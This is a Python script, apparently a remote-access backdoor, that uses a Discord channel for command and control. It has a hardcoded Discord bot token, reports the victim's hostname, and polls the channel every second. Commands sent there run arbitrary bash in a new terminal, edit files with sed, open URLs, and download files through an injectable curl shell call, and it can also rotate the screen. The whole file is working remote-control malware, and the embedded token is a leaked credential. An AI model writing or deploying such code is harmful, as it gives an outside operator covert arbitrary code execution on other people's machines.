import http.client
import sys
import json
import time
import socket
import subprocess

result = 0
tokenpart2 = "GM3l_P.mrkZgJvU5KWSoz1-onol2XfkW6YbmzlF8H1oT4"
headers = {"Content-Type": "application/json", 'Authorization': f'Bot MTIzMzQ4MTAxMDc4NDUwNTg1Nw.{tokenpart2}'}
ID = socket.gethostname()

def send_info(message):
	message_data = {"content": message}
	json_data = json.dumps(message_data)
	conn = http.client.HTTPSConnection("discord.com")
	url = f"/api/v10/channels/1341791654503514122/messages"
	conn.request("POST", url, body=json_data, headers=headers)
	conn.getresponse()
	conn.close()

def exiting():
	print("Exiting...")
	send_info(f"❌ `[{ID}] is deactivated`")
	sys.exit()

def reverse_screen():
	subprocess.run(['xrandr', '--output', 'eDP', '--rotate', 'inverted'], check=True)

def normal_screen():
	subprocess.run(['xrandr', '--output', 'eDP', '--rotate', 'normal'], check=True)

def right_screen():
	subprocess.run(['xrandr', '--output', 'eDP', '--rotate', 'right'], check=True)

def left_screen():
	subprocess.run(['xrandr', '--output', 'eDP', '--rotate', 'left'], check=True)

def new_terminal(result):
	subprocess.Popen(['gnome-terminal', '--', 'bash', '-c', f'{result}'])

def sed_terminal(result):
	resultsplit = result.split('?')
	subprocess.run(['sed', '-i', f'{resultsplit[0]}', f'{resultsplit[1]}'], check=True)

def firefox_terminal(result):
	subprocess.run(['firefox', '--new-tab', f'{result}'], check=True)

def open_img(result):
	subprocess.run(f'curl "{result}" -o img.jpg', shell=True, check=True)
	subprocess.run(['xdg-open', 'img.jpg'], check=True)

def launcher_pre(result):
	match result:
		case "exit":
			exiting()
		case "activated":
			send_info(f"✅ `{ID}-is activated`")
		case "inverted screen":
			reverse_screen()
		case "normal screen":
			normal_screen()
		case "right screen":
			right_screen()
		case "left screen":
			left_screen()
		case _:
			return

def launch_custom(splitresult):
	match splitresult[0]:
		case "newterm":
			new_terminal(splitresult[1])
		case "sed":
			sed_terminal(splitresult[1])
		case "firefox":
			firefox_terminal(splitresult[1])
		case "openimg":
			open_img(splitresult[1])
		case _:
			return

def main():
	global result
	while (True):
		try:
			#? check messages dans le salon
			conn = http.client.HTTPSConnection("discord.com")
			url = f"/api/v10/channels/1341791654503514122/messages?limit=1"
			conn.request("GET", url, headers=headers)
			response = conn.getresponse()
			paste_content = response.read().decode("utf-8")
			json_content = json.loads(paste_content)

			value = json_content[0]['content']
			values = value.split('$')
			if len(values) == 2:
				if values[0] != ID:
					time.sleep(1)
					continue
				if result != values[1]:
					result = values[1]
					splitresult = result.split('!')
					if len(splitresult) == 2:
						launch_custom(splitresult)
					else:
						launcher_pre(result)
			elif len(values) == 1:
				if result != values[0]:
					result = values[0]
					splitresult = result.split('!')
					if len(splitresult) == 2:
						launch_custom(splitresult)
					else:
						launcher_pre(result)
			time.sleep(1)
		except Exception as e:
			if e == '0' or e == 0:
				time.sleep(1)
			else:
				send_info(f"❌ `[{ID}] Error: {e}`")
				time.sleep(1)

if __name__ == "__main__":
	send_info(f"✅ `[{ID}] is activated`")
	main()
